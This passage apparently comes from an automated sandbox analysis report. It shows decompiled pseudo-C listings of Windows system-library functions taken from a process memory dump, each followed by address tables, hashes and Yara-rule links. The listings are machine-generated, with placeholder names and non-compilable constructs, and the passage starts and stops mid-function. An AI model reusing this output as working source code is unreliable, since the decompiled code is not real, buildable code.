							} else {
								_t21 = _t109 + 0x18; // 0x18
								 *((intOrPtr*)(_t109 + 4)) = _v60;
								 *_t109 = 1;
								 *((intOrPtr*)(_t109 + 0x10)) = _t21;
								 *(_t109 + 0xe) = _t82;
								 *((intOrPtr*)(_t109 + 8)) = _v56;
								 *((intOrPtr*)(_t109 + 0x14)) = _v32;
								_t29 =  &(_t103[2]); // 0x2000d02b
								E04D1F3E0(_t21,  *_t29,  *_t103 & 0x0000ffff);
								 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
								 *((short*)(_t109 + 0xc)) =  *_t103;
								_t91 =  *_t103 & 0x0000ffff;
								_t34 =  &(_t103[2]); // 0x2000d02b
								_t100 = _t91 & 0xfffffffe;
								_t84 = 0x5c;
								if( *((intOrPtr*)( *_t34 + _t100 - 2)) != _t84) {
									if(_t91 + 4 > ( *(_t109 + 0xe) & 0x0000ffff)) {
										_push(_v60);
										E04D195D0();
										L04CF77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t109);
										_t51 = 0xc0000106;
									} else {
										 *((short*)(_t100 +  *((intOrPtr*)(_t109 + 0x10)))) = _t84;
										 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + 2 + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
										 *((short*)(_t109 + 0xc)) =  *((short*)(_t109 + 0xc)) + 2;
										goto L5;
									}
								} else {
									L5:
									 *_a4 = _t109;
									_t51 = 0;
								}
							}
						}
					}
				}
				return _t51;
			}

























                                                                                            0x04d0f0d3
                                                                                            0x04d0f0d9
                                                                                            0x04d0f0e0
                                                                                            0x04d0f0e7
                                                                                            0x04d0f0f2
                                                                                            0x04d0f0f4
                                                                                            0x04d0f0f8
                                                                                            0x04d0f100
                                                                                            0x04d0f108
                                                                                            0x04d0f10d
                                                                                            0x04d0f115
                                                                                            0x04d0f116
                                                                                            0x04d0f11f
                                                                                            0x04d0f123
                                                                                            0x04d0f124
                                                                                            0x04d0f12c
                                                                                            0x04d0f130
                                                                                            0x04d0f134
                                                                                            0x04d0f13d
                                                                                            0x04d0f144
                                                                                            0x04d0f14b
                                                                                            0x04d0f152
                                                                                            0x04d4bab0
                                                                                            0x04d4bab0
                                                                                            0x04d0f158
                                                                                            0x04d0f158
                                                                                            0x04d0f15a
                                                                                            0x04d0f160
                                                                                            0x04d0f165
                                                                                            0x04d0f166
                                                                                            0x04d0f16f
                                                                                            0x04d0f173
                                                                                            0x04d4baa7
                                                                                            0x04d4baa7
                                                                                            0x04d4baab
                                                                                            0x00000000
                                                                                            0x04d0f179
                                                                                            0x04d0f179
                                                                                            0x04d0f18d
                                                                                            0x04d0f191
                                                                                            0x04d4baa2
                                                                                            0x00000000
                                                                                            0x04d0f197
                                                                                            0x04d0f19b
                                                                                            0x04d0f1a2
                                                                                            0x04d0f1a9
                                                                                            0x04d0f1af
                                                                                            0x04d0f1b2
                                                                                            0x04d0f1b6
                                                                                            0x04d0f1b9
                                                                                            0x04d0f1c0
                                                                                            0x04d0f1c4
                                                                                            0x04d0f1d8
                                                                                            0x04d0f1df
                                                                                            0x04d0f1e3
                                                                                            0x04d0f1e6
                                                                                            0x04d0f1eb
                                                                                            0x04d0f1ee
                                                                                            0x04d0f1f4
                                                                                            0x04d0f20f
                                                                                            0x04d4bab7
                                                                                            0x04d4babb
                                                                                            0x04d4bacc
                                                                                            0x04d4bad1
                                                                                            0x04d0f215
                                                                                            0x04d0f218
                                                                                            0x04d0f226
                                                                                            0x04d0f22b
                                                                                            0x00000000
                                                                                            0x04d0f22b
                                                                                            0x04d0f1f6
                                                                                            0x04d0f1f6
                                                                                            0x04d0f1f9
                                                                                            0x04d0f1fb
                                                                                            0x04d0f1fb
                                                                                            0x04d0f1f4
                                                                                            0x04d0f191
                                                                                            0x04d0f173
                                                                                            0x04d0f152
                                                                                            0x04d0f203

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.481988311.0000000004CB0000.00000040.00000001.sdmp, Offset: 04CB0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.482563022.0000000004DCB000.00000040.00000001.sdmp Download File
                                                                                            • Associated: 0000000A.00000002.482592275.0000000004DCF000.00000040.00000001.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: @
                                                                                            • API String ID: 0-2766056989
                                                                                            • Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                                                                            • Instruction ID: b6e0510659ffcb8c7cf1c1f05c900734b591adddb0a1743c90284e9744474699
                                                                                            • Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                                                                            • Instruction Fuzzy Hash: 0151A071204710AFD321DF25C840A67B7F4FF48714F10892EF995976A0E7B4E904CB91
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 04D53540, Relevance: 1.4, Strings: 1, Instructions: 130COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 75%
                                                                                            			E04D53540(intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v88;
				intOrPtr _v92;
				char _v96;
				char _v352;
				char _v1072;
				intOrPtr _v1140;
				intOrPtr _v1148;
				char _v1152;
				char _v1156;
				char _v1160;
				char _v1164;
				char _v1168;
				char* _v1172;
				short _v1174;
				char _v1176;
				char _v1180;
				char _v1192;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				short _t41;
				short _t42;
				intOrPtr _t80;
				intOrPtr _t81;
				signed int _t82;
				void* _t83;

				_v12 =  *0x4dcd360 ^ _t82;
				_t41 = 0x14;
				_v1176 = _t41;
				_t42 = 0x16;
				_v1174 = _t42;
				_v1164 = 0x100;
				_v1172 = L"BinaryHash";
				_t81 = E04D10BE0(0xfffffffc,  &_v352,  &_v1164, 0, 0, 0,  &_v1192);
				if(_t81 < 0) {
					L11:
					_t75 = _t81;
					E04D53706(0, _t81, _t79, _t80);
					L12:
					if(_a4 != 0xc000047f) {
						E04D1FA60( &_v1152, 0, 0x50);
						_v1152 = 0x60c201e;
						_v1148 = 1;
						_v1140 = E04D53540;
						E04D1FA60( &_v1072, 0, 0x2cc);
						_push( &_v1072);
						E04D2DDD0( &_v1072, _t75, _t79, _t80, _t81);
						E04D60C30(0, _t75, _t80,  &_v1152,  &_v1072, 2);
						_push(_v1152);
						_push(0xffffffff);
						E04D197C0();
					}
					return E04D1B640(0xc0000135, 0, _v12 ^ _t82, _t79, _t80, _t81);
				}
				_t79 =  &_v352;
				_t81 = E04D53971(0, _a4,  &_v352,  &_v1156);
				if(_t81 < 0) {
					goto L11;
				}
				_t75 = _v1156;
				_t79 =  &_v1160;
				_t81 = E04D53884(_v1156,  &_v1160,  &_v1168);
				if(_t81 >= 0) {
					_t80 = _v1160;
					E04D1FA60( &_v96, 0, 0x50);
					_t83 = _t83 + 0xc;
					_push( &_v1180);
					_push(0x50);
					_push( &_v96);
					_push(2);
					_push( &_v1176);
					_push(_v1156);
					_t81 = E04D19650();
					if(_t81 >= 0) {
						if(_v92 != 3 || _v88 == 0) {
							_t81 = 0xc000090b;
						}
						if(_t81 >= 0) {
							_t75 = _a4;
							_t79 =  &_v352;
							E04D53787(_a4,  &_v352, _t80);
						}
					}
					L04CF77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v1168);
				}
				_push(_v1156);
				E04D195D0();
				if(_t81 >= 0) {
					goto L12;
				} else {
					goto L11;
				}
			}































                                                                                            0x04d53552
                                                                                            0x04d5355a
                                                                                            0x04d5355d
                                                                                            0x04d53566
                                                                                            0x04d53567
                                                                                            0x04d5357e
                                                                                            0x04d5358f
                                                                                            0x04d535a1
                                                                                            0x04d535a5
                                                                                            0x04d5366b
                                                                                            0x04d5366b
                                                                                            0x04d5366d
                                                                                            0x04d53672
                                                                                            0x04d53679
                                                                                            0x04d53685
                                                                                            0x04d5368d
                                                                                            0x04d5369d
                                                                                            0x04d536a7
                                                                                            0x04d536b8
                                                                                            0x04d536c6
                                                                                            0x04d536c7
                                                                                            0x04d536dc
                                                                                            0x04d536e1
                                                                                            0x04d536e7
                                                                                            0x04d536e9
                                                                                            0x04d536e9
                                                                                            0x04d53703
                                                                                            0x04d53703
                                                                                            0x04d535b5
                                                                                            0x04d535c0
                                                                                            0x04d535c4
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04d535ca
                                                                                            0x04d535d7
                                                                                            0x04d535e2
                                                                                            0x04d535e6
                                                                                            0x04d535e8
                                                                                            0x04d535f5
                                                                                            0x04d535fa
                                                                                            0x04d53603
                                                                                            0x04d53604
                                                                                            0x04d53609
                                                                                            0x04d5360a
                                                                                            0x04d53612
                                                                                            0x04d53613
                                                                                            0x04d5361e
                                                                                            0x04d53622
                                                                                            0x04d53628
                                                                                            0x04d5362f
                                                                                            0x04d5362f
                                                                                            0x04d53636
                                                                                            0x04d53638
                                                                                            0x04d5363b
                                                                                            0x04d53642
                                                                                            0x04d53642
                                                                                            0x04d53636
                                                                                            0x04d53657
                                                                                            0x04d53657
                                                                                            0x04d5365c
                                                                                            0x04d53662
                                                                                            0x04d53669
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.481988311.0000000004CB0000.00000040.00000001.sdmp, Offset: 04CB0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.482563022.0000000004DCB000.00000040.00000001.sdmp Download File
                                                                                            • Associated: 0000000A.00000002.482592275.0000000004DCF000.00000040.00000001.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID: BinaryHash
                                                                                            • API String ID: 2994545307-2202222882
                                                                                            • Opcode ID: 78907a8d74cebf86191ed08aafcfb3529e3dda5215031e1c6e772a50d73b5873
                                                                                            • Instruction ID: 09b235af3fd963d5f3fe289584f29488e2d6cc18d7c184b00774154afa5cb6c7
                                                                                            • Opcode Fuzzy Hash: 78907a8d74cebf86191ed08aafcfb3529e3dda5215031e1c6e772a50d73b5873
                                                                                            • Instruction Fuzzy Hash: CB4136F1D0152DABEF219A50DC84F9EB77CEB44758F004599EE09A7250DB30AE88CFA5
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 04DA05AC, Relevance: 1.4, Strings: 1, Instructions: 115COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 71%
                                                                                            			E04DA05AC(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v28;
				char _v32;
				signed int _v36;
				intOrPtr _v40;
				void* __ebx;
				void* _t35;
				signed int _t42;
				char* _t48;
				signed int _t59;
				signed char _t61;
				signed int* _t79;
				void* _t88;

				_v28 = __edx;
				_t79 = __ecx;
				if(E04DA07DF(__ecx, __edx,  &_a4,  &_a8, 0) == 0) {
					L13:
					_t35 = 0;
					L14:
					return _t35;
				}
				_t61 = __ecx[1];
				_t59 = __ecx[0xf];
				_v32 = (_a4 << 0xc) + (__edx - ( *__ecx & __edx) >> 4 << _t61) + ( *__ecx & __edx);
				_v36 = _a8 << 0xc;
				_t42 =  *(_t59 + 0xc) & 0x40000000;
				asm("sbb esi, esi");
				_t88 = ( ~_t42 & 0x0000003c) + 4;
				if(_t42 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t59);
					_push(0xffffffff);
					if(E04D19730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t59) {
						_push(_t61);
						E04D9A80D(_t59, 1, _v20, 0);
						_t88 = 4;
					}
				}
				_t35 = E04D9A854( &_v32,  &_v36, 0, 0x1000, _t88, 0,  *((intOrPtr*)(_t79 + 0x34)),  *((intOrPtr*)(_t79 + 0x38)));
				if(_t35 < 0) {
					goto L14;
				}
				E04DA1293(_t79, _v40, E04DA07DF(_t79, _v28,  &_a4,  &_a8, 1));
				if(E04CF7D50() == 0) {
					_t48 = 0x7ffe0380;
				} else {
					_t48 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				if( *_t48 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
					E04D9138A(_t59,  *((intOrPtr*)(_t79 + 0x3c)), _v32, _v36, 0xa);
				}
				goto L13;
			}

















                                                                                            0x04da05c5
                                                                                            0x04da05ca
                                                                                            0x04da05d3
                                                                                            0x04da06db
                                                                                            0x04da06db
                                                                                            0x04da06dd
                                                                                            0x04da06e3
                                                                                            0x04da06e3
                                                                                            0x04da05dd
                                                                                            0x04da05e7
                                                                                            0x04da05f6
                                                                                            0x04da0600
                                                                                            0x04da0607
                                                                                            0x04da0610
                                                                                            0x04da0615
                                                                                            0x04da061a
                                                                                            0x04da061c
                                                                                            0x04da061e
                                                                                            0x04da0624
                                                                                            0x04da0625
                                                                                            0x04da0627
                                                                                            0x04da0628
                                                                                            0x04da0631
                                                                                            0x04da0640
                                                                                            0x04da064d
                                                                                            0x04da0654
                                                                                            0x04da0654
                                                                                            0x04da0631
                                                                                            0x04da066d
                                                                                            0x04da0674
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04da0692
                                                                                            0x04da069e
                                                                                            0x04da06b0
                                                                                            0x04da06a0
                                                                                            0x04da06a9
                                                                                            0x04da06a9
                                                                                            0x04da06b8
                                                                                            0x04da06d6
                                                                                            0x04da06d6
                                                                                            0x00000000

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.481988311.0000000004CB0000.00000040.00000001.sdmp, Offset: 04CB0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.482563022.0000000004DCB000.00000040.00000001.sdmp Download File
                                                                                            • Associated: 0000000A.00000002.482592275.0000000004DCF000.00000040.00000001.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: `
                                                                                            • API String ID: 0-2679148245
                                                                                            • Opcode ID: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                                                                            • Instruction ID: 2ac40c30aed2ee6f9217ee021c6272cbf493ff27b774b413e0be313963e2d454
                                                                                            • Opcode Fuzzy Hash: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                                                                            • Instruction Fuzzy Hash: BE31D1327047456BE722DE24CD85F9B77D9FB84758F084229FA58EB280D670F924CBA1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 04D53884, Relevance: 1.3, Strings: 1, Instructions: 95COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 72%
                                                                                            			E04D53884(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				char* _v20;
				short _v22;
				char _v24;
				intOrPtr _t38;
				short _t40;
				short _t41;
				void* _t44;
				intOrPtr _t47;
				void* _t48;

				_v16 = __edx;
				_t40 = 0x14;
				_v24 = _t40;
				_t41 = 0x16;
				_v22 = _t41;
				_t38 = 0;
				_v12 = __ecx;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(2);
				_t43 =  &_v24;
				_v20 = L"BinaryName";
				_push( &_v24);
				_push(__ecx);
				_t47 = 0;
				_t48 = E04D19650();
				if(_t48 >= 0) {
					_t48 = 0xc000090b;
				}
				if(_t48 != 0xc0000023) {
					_t44 = 0;
					L13:
					if(_t48 < 0) {
						L16:
						if(_t47 != 0) {
							L04CF77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t44, _t47);
						}
						L18:
						return _t48;
					}
					 *_v16 = _t38;
					 *_a4 = _t47;
					goto L18;
				}
				_t47 = L04CF4620(_t43,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				if(_t47 != 0) {
					_push( &_v8);
					_push(_v8);
					_push(_t47);
					_push(2);
					_push( &_v24);
					_push(_v12);
					_t48 = E04D19650();
					if(_t48 < 0) {
						_t44 = 0;
						goto L16;
					}
					if( *((intOrPtr*)(_t47 + 4)) != 1 ||  *(_t47 + 8) < 4) {
						_t48 = 0xc000090b;
					}
					_t44 = 0;
					if(_t48 < 0) {
						goto L16;
					} else {
						_t17 = _t47 + 0xc; // 0xc
						_t38 = _t17;
						if( *((intOrPtr*)(_t38 + ( *(_t47 + 8) >> 1) * 2 - 2)) != 0) {
							_t48 = 0xc000090b;
						}
						goto L13;
					}
				}
				_t48 = _t48 + 0xfffffff4;
				goto L18;
			}















                                                                                            0x04d53893
                                                                                            0x04d53896
                                                                                            0x04d53899
                                                                                            0x04d5389f
                                                                                            0x04d538a0
                                                                                            0x04d538a4
                                                                                            0x04d538a9
                                                                                            0x04d538ac
                                                                                            0x04d538ad
                                                                                            0x04d538ae
                                                                                            0x04d538af
                                                                                            0x04d538b1
                                                                                            0x04d538b4
                                                                                            0x04d538bb
                                                                                            0x04d538bc
                                                                                            0x04d538bd
                                                                                            0x04d538c4
                                                                                            0x04d538c8
                                                                                            0x04d538ca
                                                                                            0x04d538ca
                                                                                            0x04d538d5
                                                                                            0x04d5393e
                                                                                            0x04d53940
                                                                                            0x04d53942
                                                                                            0x04d53952
                                                                                            0x04d53954
                                                                                            0x04d53961
                                                                                            0x04d53961
                                                                                            0x04d53967
                                                                                            0x04d5396e
                                                                                            0x04d5396e
                                                                                            0x04d53947
                                                                                            0x04d5394c
                                                                                            0x00000000
                                                                                            0x04d5394c
                                                                                            0x04d538ea
                                                                                            0x04d538ee
                                                                                            0x04d538f8
                                                                                            0x04d538f9
                                                                                            0x04d538ff
                                                                                            0x04d53900
                                                                                            0x04d53902
                                                                                            0x04d53903
                                                                                            0x04d5390b
                                                                                            0x04d5390f
                                                                                            0x04d53950
                                                                                            0x00000000
                                                                                            0x04d53950
                                                                                            0x04d53915
                                                                                            0x04d5391d
                                                                                            0x04d5391d
                                                                                            0x04d53922
                                                                                            0x04d53926
                                                                                            0x00000000
                                                                                            0x04d53928
                                                                                            0x04d5392b
                                                                                            0x04d5392b
                                                                                            0x04d53935
                                                                                            0x04d53937
                                                                                            0x04d53937
                                                                                            0x00000000
                                                                                            0x04d53935
                                                                                            0x04d53926
                                                                                            0x04d538f0
                                                                                            0x00000000

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.481988311.0000000004CB0000.00000040.00000001.sdmp, Offset: 04CB0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.482563022.0000000004DCB000.00000040.00000001.sdmp Download File
                                                                                            • Associated: 0000000A.00000002.482592275.0000000004DCF000.00000040.00000001.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID: BinaryName
                                                                                            • API String ID: 2994545307-215506332
                                                                                            • Opcode ID: c3dcd9610a7c37aa56cd6d00f3db914d5182eb21de3ef54dafcec73689c473bc
                                                                                            • Instruction ID: 7eee944abbc79bd2cde46d83f80384b1c6c9b55a77fda5e943c40569469039a2
                                                                                            • Opcode Fuzzy Hash: c3dcd9610a7c37aa56cd6d00f3db914d5182eb21de3ef54dafcec73689c473bc
                                                                                            • Instruction Fuzzy Hash: C731F4B2900609AFEF25DA58C945D6BF774FF817A0F014169ED54A7660DB30FE00CBA0
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 04D0D294, Relevance: 1.3, Strings: 1, Instructions: 93COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 33%
                                                                                            			E04D0D294(void* __ecx, char __edx, void* __eflags) {
				signed int _v8;
				char _v52;
				signed int _v56;
				signed int _v60;
				intOrPtr _v64;
				char* _v68;
				intOrPtr _v72;
				char _v76;
				signed int _v84;
				intOrPtr _v88;
				char _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				char _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				char _t38;
				signed int _t40;
				signed int _t44;
				signed int _t52;
				void* _t53;
				void* _t55;
				void* _t61;
				intOrPtr _t62;
				void* _t64;
				signed int _t65;
				signed int _t66;

				_t68 = (_t66 & 0xfffffff8) - 0x6c;
				_v8 =  *0x4dcd360 ^ (_t66 & 0xfffffff8) - 0x0000006c;
				_v105 = __edx;
				_push( &_v92);
				_t52 = 0;
				_push(0);
				_push(0);
				_push( &_v104);
				_push(0);
				_t59 = __ecx;
				_t55 = 2;
				if(E04CF4120(_t55, __ecx) < 0) {
					_t35 = 0;
					L8:
					_pop(_t61);
					_pop(_t64);
					_pop(_t53);
					return E04D1B640(_t35, _t53, _v8 ^ _t68, _t59, _t61, _t64);
				}
				_v96 = _v100;
				_t38 = _v92;
				if(_t38 != 0) {
					_v104 = _t38;
					_v100 = _v88;
					_t40 = _v84;
				} else {
					_t40 = 0;
				}
				_v72 = _t40;
				_v68 =  &_v104;
				_push( &_v52);
				_v76 = 0x18;
				_push( &_v76);
				_v64 = 0x40;
				_v60 = _t52;
				_v56 = _t52;
				_t44 = E04D198D0();
				_t62 = _v88;
				_t65 = _t44;
				if(_t62 != 0) {
					asm("lock xadd [edi], eax");
					if((_t44 | 0xffffffff) != 0) {
						goto L4;
					}
					_push( *((intOrPtr*)(_t62 + 4)));
					E04D195D0();
					L04CF77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _t62);
					goto L4;
				} else {
					L4:
					L04CF77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _v96);
					if(_t65 >= 0) {
						_t52 = 1;
					} else {
						if(_t65 == 0xc0000043 || _t65 == 0xc0000022) {
							_t52 = _t52 & 0xffffff00 | _v105 != _t52;
						}
					}
					_t35 = _t52;
					goto L8;
				}
			}

































                                                                                            0x04d0d29c
                                                                                            0x04d0d2a6
                                                                                            0x04d0d2b1
                                                                                            0x04d0d2b5
                                                                                            0x04d0d2b6
                                                                                            0x04d0d2bc
                                                                                            0x04d0d2bd
                                                                                            0x04d0d2be
                                                                                            0x04d0d2bf
                                                                                            0x04d0d2c2
                                                                                            0x04d0d2c4
                                                                                            0x04d0d2cc
                                                                                            0x04d0d384
                                                                                            0x04d0d34b
                                                                                            0x04d0d34f
                                                                                            0x04d0d350
                                                                                            0x04d0d351
                                                                                            0x04d0d35c
                                                                                            0x04d0d35c
                                                                                            0x04d0d2d6
                                                                                            0x04d0d2da
                                                                                            0x04d0d2e1
                                                                                            0x04d0d361
                                                                                            0x04d0d369
                                                                                            0x04d0d36d
                                                                                            0x04d0d2e3
                                                                                            0x04d0d2e3
                                                                                            0x04d0d2e3
                                                                                            0x04d0d2e5
                                                                                            0x04d0d2ed
                                                                                            0x04d0d2f5
                                                                                            0x04d0d2fa
                                                                                            0x04d0d302
                                                                                            0x04d0d303
                                                                                            0x04d0d30b
                                                                                            0x04d0d30f
                                                                                            0x04d0d313
                                                                                            0x04d0d318
                                                                                            0x04d0d31c
                                                                                            0x04d0d320
                                                                                            0x04d0d379
                                                                                            0x04d0d37d
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04d4affe
                                                                                            0x04d4b001
                                                                                            0x04d4b011
                                                                                            0x00000000
                                                                                            0x04d0d322
                                                                                            0x04d0d322
                                                                                            0x04d0d330
                                                                                            0x04d0d337
                                                                                            0x04d0d35d
                                                                                            0x04d0d339
                                                                                            0x04d0d33f
                                                                                            0x04d0d38c
                                                                                            0x04d0d38c
                                                                                            0x04d0d33f
                                                                                            0x04d0d349
                                                                                            0x00000000
                                                                                            0x04d0d349

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.481988311.0000000004CB0000.00000040.00000001.sdmp, Offset: 04CB0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.482563022.0000000004DCB000.00000040.00000001.sdmp Download File
                                                                                            • Associated: 0000000A.00000002.482592275.0000000004DCF000.00000040.00000001.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: @
                                                                                            • API String ID: 0-2766056989
                                                                                            • Opcode ID: cd09e7bff8ce8927f5fd3e158b38d1444a8acb5555b181eb54155690a02801c1
                                                                                            • Instruction ID: fd2a0cf941799c0935f7d9428f8e9eafbc2aebcb95f05cfdbfddee01ef5fac8a
                                                                                            • Opcode Fuzzy Hash: cd09e7bff8ce8927f5fd3e158b38d1444a8acb5555b181eb54155690a02801c1
                                                                                            • Instruction Fuzzy Hash: A231C4B1608305AFD711DF68C880A6BBBE9FB85754F00492FF99483250E638FD04DBA2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 04CE1B8F, Relevance: 1.3, Strings: 1, Instructions: 86COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 72%
                                                                                            			E04CE1B8F(void* __ecx, intOrPtr __edx, intOrPtr* _a4, signed int* _a8) {
				intOrPtr _v8;
				char _v16;
				intOrPtr* _t26;
				intOrPtr _t29;
				void* _t30;
				signed int _t31;

				_t27 = __ecx;
				_t29 = __edx;
				_t31 = 0;
				_v8 = __edx;
				if(__edx == 0) {
					L18:
					_t30 = 0xc000000d;
					goto L12;
				} else {
					_t26 = _a4;
					if(_t26 == 0 || _a8 == 0 || __ecx == 0) {
						goto L18;
					} else {
						E04D1BB40(__ecx,  &_v16, __ecx);
						_push(_t26);
						_push(0);
						_push(0);
						_push(_t29);
						_push( &_v16);
						_t30 = E04D1A9B0();
						if(_t30 >= 0) {
							_t19 =  *_t26;
							if( *_t26 != 0) {
								goto L7;
							} else {
								 *_a8 =  *_a8 & 0;
							}
						} else {
							if(_t30 != 0xc0000023) {
								L9:
								_push(_t26);
								_push( *_t26);
								_push(_t31);
								_push(_v8);
								_push( &_v16);
								_t30 = E04D1A9B0();
								if(_t30 < 0) {
									L12:
									if(_t31 != 0) {
										L04CF77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t31);
									}
								} else {
									 *_a8 = _t31;
								}
							} else {
								_t19 =  *_t26;
								if( *_t26 == 0) {
									_t31 = 0;
								} else {
									L7:
									_t31 = L04CF4620(_t27,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t19);
								}
								if(_t31 == 0) {
									_t30 = 0xc0000017;
								} else {
									goto L9;
								}
							}
						}
					}
				}
				return _t30;
			}









                                                                                            0x04ce1b8f
                                                                                            0x04ce1b9a
                                                                                            0x04ce1b9c
                                                                                            0x04ce1b9e
                                                                                            0x04ce1ba3
                                                                                            0x04d37010
                                                                                            0x04d37010
                                                                                            0x00000000
                                                                                            0x04ce1ba9
                                                                                            0x04ce1ba9
                                                                                            0x04ce1bae
                                                                                            0x00000000
                                                                                            0x04ce1bc5
                                                                                            0x04ce1bca
                                                                                            0x04ce1bcf
                                                                                            0x04ce1bd0
                                                                                            0x04ce1bd1
                                                                                            0x04ce1bd2
                                                                                            0x04ce1bd6
                                                                                            0x04ce1bdc
                                                                                            0x04ce1be0
                                                                                            0x04d36ffc
                                                                                            0x04d37000
                                                                                            0x00000000
                                                                                            0x04d37006
                                                                                            0x04d37009
                                                                                            0x04d37009
                                                                                            0x04ce1be6
                                                                                            0x04ce1bec
                                                                                            0x04ce1c0b
                                                                                            0x04ce1c0b
                                                                                            0x04ce1c0c
                                                                                            0x04ce1c11
                                                                                            0x04ce1c12
                                                                                            0x04ce1c15
                                                                                            0x04ce1c1b
                                                                                            0x04ce1c1f
                                                                                            0x04ce1c31
                                                                                            0x04ce1c33
                                                                                            0x04d37026
                                                                                            0x04d37026
                                                                                            0x04ce1c21
                                                                                            0x04ce1c24
                                                                                            0x04ce1c24
                                                                                            0x04ce1bee
                                                                                            0x04ce1bee
                                                                                            0x04ce1bf2
                                                                                            0x04ce1c3a
                                                                                            0x04ce1bf4
                                                                                            0x04ce1bf4
                                                                                            0x04ce1c05
                                                                                            0x04ce1c05
                                                                                            0x04ce1c09
                                                                                            0x04ce1c3e
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04ce1c09
                                                                                            0x04ce1bec
                                                                                            0x04ce1be0
                                                                                            0x04ce1bae
                                                                                            0x04ce1c2e

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.481988311.0000000004CB0000.00000040.00000001.sdmp, Offset: 04CB0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.482563022.0000000004DCB000.00000040.00000001.sdmp Download File
                                                                                            • Associated: 0000000A.00000002.482592275.0000000004DCF000.00000040.00000001.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: WindowsExcludedProcs
                                                                                            • API String ID: 0-3583428290
                                                                                            • Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                                                                            • Instruction ID: 1f7b0fba27fb67a11fc7f7b5313d8db44f73c390d13c518bf3c69c6706ac9898
                                                                                            • Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                                                                            • Instruction Fuzzy Hash: D321D376701628ABDB229A978940F6BB7BAEB41751F0D4466BD04DB200EB30F910D7A0
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 04CFF716, Relevance: 1.3, Strings: 1, Instructions: 71COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 100%
                                                                                            			E04CFF716(signed int __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
				intOrPtr _t13;
				intOrPtr _t14;
				signed int _t16;
				signed char _t17;
				intOrPtr _t19;
				intOrPtr _t21;
				intOrPtr _t23;
				intOrPtr* _t25;

				_t25 = _a8;
				_t17 = __ecx;
